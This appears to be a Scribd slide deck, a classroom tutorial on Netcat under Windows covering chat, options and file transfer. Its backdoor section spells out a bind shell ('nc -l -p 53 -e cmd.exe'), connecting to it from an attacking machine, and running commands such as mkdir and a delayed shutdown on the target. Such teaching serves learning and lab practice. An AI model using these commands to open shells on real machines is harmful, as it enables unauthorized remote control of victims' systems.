Scribd
Upload
19 views28 pages

Netcat Windowschatting and Backdoor 1

Uploaded by

saurabhkrp77
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
19 views28 pages

Netcat Windowschatting and Backdoor 1

Uploaded by

saurabhkrp77
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 28

CHATTING AND

BACKDOOR USING
NETCAT (WINDOWS)
What is Netcat?

 Abbreviated as “nc”
 Computer networking service for reading

from and writing to network connections


using TCP or UDP
 Tool for debugging all kinds of network

problems
 Also known as “TCP/IP Swiss Army Knife”
Features of Netcat
 Chatting
 Port Scanning
 Port Listening
 File transfer
 Backdoor (controlling remote system)
CHATTING USING NETCAT
 Sending and receiving messages on netcat
 We will use two instances of netcat running

on one computer(1 host machine + 1 virtual


machine)
 One instance will be listener (server)(host)

and other will be client(virtual)


Steps to perform chatting
1. Find ip address of both machines
2. First of all, in cmd, change your directory to
nc111nt (folder of netcat),in both Host and
Virtual machine.
3. In host machine, type command and press
enter.
nc –l –p 31337
(shown in next slide)
Netcat as a listener on port 31337
 nc is abbreviation of Netcat
 -l represents listen mode for inbound

connects
 -p represents port
 31337 is a TCP port number(can use any)

4. In virtual machine’s cmd, type :


nc 192.168.1.102 31337 (Press enter)
 nc is abbreviation of Netcat
 192.168.1.102 is ip address of host
(window)machine
 31337 is a TCP port number
5. Then we type hiii(any message)and
press enter, it will automatically
appear on host’s cmd.
Message hiii appeared automatically
in host machine’s cmd.
Key points
 If we are communicating on a single
machine, then instead of using ip address of
another machine, do use “localhost”
 We can type any message, this is just a

demo
 We can use any port number
 It is a kind of client-server communication
 Netcat must be installed on both machines.
BACKDOOR USING NETCAT

 To get a remote command prompt


 Means of access to a computer program

that byepasses security mechanisms.


 There will be 1 attacking machine(virtual)

and 1 target machine(host)


Steps for creating
Backdoor using Netcat
1. Find out ip addresses of both machines
2. First of all, in cmd, change your directory to
nc111nt (folder of netcat),in both Host and
Virtual machine.
3. Then we will type command(shown
in snapshot)
nc –l –p 53 –e cmd.exe(on host
machine)
 nc or nc64.exe you can write in command
 -l represents listen mode for inbound

connects
 -p represents port
 31337 is a TCP port number(can use any)
 -e cmd.exe represents opening security

holes and executing cmd.exe


 This will take target machine in listening

mode.
4. Then on attacking machine (linux)execute command
nc 192.168.1.102 53
(ip address of window on linux terminal)
 nc represents netcat
 192.168.1.102 represents ip address of host

machine(target)
 53 is port number
 After executing this command, it will take us

to target machine
 Now we can do anything we want to do on

target’s machine
5. Now on attacking machine’s cmd, if we do
“ipconfig”, it will show us the ip address of
target machine.
6. Now the target machine’s desktop(shown
below) has no folder namely NetcatDemo
7. On attacking machine, we will do “mkdir
NetcatDemo”, it will create folder on target
machine’s desktop.
8. Screen showing desktop of target machine,
now having folder named NetcatDemo.
9. We can also execute following command, if
we want that target machine will shutdown
after 50000secs(your wish)
 Shutdown represents the command that will
shutdown the target machine
 -r represents that it has to run this

command
 -t represents the time after which the

machine will shutdown


 50000 represents time in seconds.

So, we can perform anything we want to do


on target machine
Different OPTIONS in
Netcat
 -d : Detach from console
 -e prog : inbound program to exec
 -g gateway : source-routing hop point,upto 8
 -G num : source-routing pointer :4,8,12,..
 -h : help
 -i secs : delay interval forlines sent, ports
scanned
 -l : listen mode
 -L : listen harder, re-listen on sockets close
 -n : numeric only IP addresses, no DNS
Continued...
 -o file : hex dump of traffic
 -p port : local port number
 -r : randomize local and remote ports
 -s addr : local source address
 -t : answer telnet negotiation
 -u : UDP mode
 -v : level of verboosity(use twice for more
verbosity)
 -w secs : timeout for connects and final net
reads
 -z : zero-I/O mode (used for scanning)
For sharing file
For sending and receiving file these commands
needs to be written in linux and window
simultaneously : Here Aryan is the file which is
send from linux to window and kavitanet.txt is the
file which is send from window to linux
These commands need to be
run on the window terminal

You might also like